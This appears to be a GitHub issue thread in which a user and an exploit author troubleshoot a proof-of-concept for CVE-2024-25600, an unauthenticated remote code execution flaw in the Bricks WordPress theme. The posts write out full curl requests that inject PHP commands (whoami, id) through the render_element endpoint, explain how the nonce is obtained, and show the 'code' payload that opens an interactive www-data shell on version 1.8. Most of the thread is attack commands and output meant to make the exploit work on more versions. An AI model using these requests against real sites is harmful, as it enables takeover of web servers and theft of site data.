Nonce obtained but not expected exploit response

[NozoMizore7]

Wordpress Version 6.4.3
Bricks Version: 1.8

Just installed the Bricks theme, no further configuration.

python3 exploit.py -u http://172.16.101.169:8000/
url to fetch nonce: http://172.16.101.169:8000/
[*] Nonce found: 7985d3d59c
200 {"data":{"html":"<div class=\"brxe-7c8047 brxe-container\"><\/div>"}}
[-] http://172.16.101.169:8000/ is not vulnerable to CVE-2024-25600. No extracted_text

Same happened when I tried the curl:

curl -k -X POST http://172.16.101.169:8000/wp-json/bricks/v1/render_element -H "Content-Type: application/json" -d '{
  "postId": "1",
  "nonce": "7985d3d59c",
  "element": {
    "name": "container",
    "settings": {
      "hasLoop": "true",
      "query": {
        "useQueryEditor": true,
        "queryEditor": "throw new Exception(`whoami`);",
        "objectType": "post"
      }
    }
  }
}'
{"data":{"html":"<div class=\"brxe-f7e897 brxe-container\"><\/div>"}}

[NozoMizore7]

another strange thing is that the nonce obtained by the requests.get or curl are the same, but they are different from the one I see on the webpage, and only the former nonce is vaild, using the later nonce would return 403:
{"code":"rest_cookie_invalid_nonce","message":"Cookie check failed","data":{"status":403}}

[Chocapikk]

Hello, I've updated my code, in fact from what I understand, the payload I used doesn't work on all versions because the feature wasn't implemented, but I don't really know since I don't have access to the version history.

I've made a lot of changes at 2f9dfea

Come back when you can and tell me if it's fixed :D.

In the end, there are still several payloads that are possible to trigger the RCE.

Regarding the nonce, it's very strange what you're saying. Are you sure you've chosen the right nonce in "nonce", which itself is in the "bricksData" variable in a script tag?

[NozoMizore7]

Checked your new version, still not workable.

python3 exploit.py -u http://172.16.101.169:8000/
url to fetch nonce: http://172.16.101.169:8000/
[*] Nonce found: 7985d3d59c
200 {"data":{"html":"<div id=\"brxe-e54455\" data-script-id=\"e54455\" class=\"brxe-carousel\"><div class=\"bricks-swiper-container\" data-script-args=\"{&quot;slidesPerView&quot;:2,&quot;slidesPerGroup&quot;:1,&quot;speed&quot;:300,&quot;autoHeight&quot;:false,&quot;effect&quot;:&quot;slide&quot;,&quot;spaceBetween&quot;:0,&quot;initialSlide&quot;:0,&quot;loop&quot;:false,&quot;centeredSlides&quot;:false}\"><div class=\"swiper-wrapper\"><div class=\"repeater-item swiper-slide\"><\/div><\/div><\/div><\/div>"}}
[-] http://172.16.101.169:8000/ is not vulnerable to CVE-2024-25600. No extracted_text
[-] No vulnerability found.

curl -k -X POST http://172.16.101.169:8000/wp-json/bricks/v1/render_element \
  -H "Content-Type: application/json" \
  -d '{
  "postId": "1",
  "nonce": "7985d3d59c",
  "element": {
    "name": "carousel",
    "settings": {
      "type": "posts",
      "query": {
        "useQueryEditor": true,
        "queryEditor": "throw new Exception(`id`);",
        "objectType": "post"
      }
    }
  }
}'
{"data":{"html":"<div id=\"brxe-313533\" data-script-id=\"313533\" class=\"brxe-carousel\"><div class=\"bricks-swiper-container\" data-script-args=\"{&quot;slidesPerView&quot;:2,&quot;slidesPerGroup&quot;:1,&quot;speed&quot;:300,&quot;autoHeight&quot;:false,&quot;effect&quot;:&quot;slide&quot;,&quot;spaceBetween&quot;:0,&quot;initialSlide&quot;:0,&quot;loop&quot;:false,&quot;centeredSlides&quot;:false}\"><div class=\"swiper-wrapper\"><div class=\"repeater-item swiper-slide\"><\/div><\/div><\/div><\/div>"}}

Regarding the nonce, as you see the valid nonce obtained by the exploit.py is '7985d3d59c', but the same webpage in browser show '74a57b1080' instead(this one is invalid).

[Chocapikk]

Well, regarding the nonce I tried to reproduce what you told me and indeed I see the same behavior, that the nonce is different depending on the browser or curl. I don't know the cause but to overcome this problem you can just retrieve the nonce from your curl request and then run the curl PoC. It will work. As for injecting php code on version 1.8, No idea why it's not working on your instance

[Chocapikk]

Hey,

Just took a deeper dive into the Bricks version 1.8 code and compared it with version 1.9.5 based on the issue you opened. Here's the gist of what I found:

It looks like in version 1.8, the eval() functionality isn't incorporated in prepare_query_vars_from_settings. However, the code element in Bricks was already accessible for code execution even back in 1.8. This makes the code payload work effectively, as it leverages an existing feature that wasn't specifically guarded against in earlier versions.

Here’s a quick recap on the payloads:

Working payload:

$ python exploit.py -u http://localhost:8888 --payload-type code
[*] Nonce found: de1e9b5b98
[+] http://localhost:8888 is vulnerable to CVE-2024-25600. Command output: www-data
[!] Shell is ready, please type your commands UwU
# id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
#

This demonstrates that the code payload effectively exploits the vulnerability because the code element, present since version 1.8, allows for direct code execution.

Non-working payloads (everything except "code"):

$ python exploit.py -u http://localhost:8888 --payload-type container
[*] Nonce found: de1e9b5b98
[!] http://localhost:8888 is vulnerable to CVE-2024-25600 with successful auth bypass, but RCE was not achieved.
[!] Debug:
<div class="brxe-4e2abb brxe-container"></div><div class="brxe-5dd3e6 brxe-container"></div><div class="brxe-074779 brxe-container"></div><div class="brxe-3a15e2 brxe-container"></div><div class="brxe-4b613e brxe-container"></div><div class="brxe-c26a94 brxe-container"></div><div class="brxe-2007f5 brxe-container"></div><div class="brxe-c4d281 brxe-container"></div><div class="brxe-cbf0aa brxe-container"></div><div class="brxe-070714 brxe-container"></div>

Hope this clears up why the code payload works and others don’t as effectively Then you can update the exploit and try again. Thanks for pointing this out!

[NozoMizore7]

I tried the new payload and it does work on the 1.8 version. Thank you for your effort!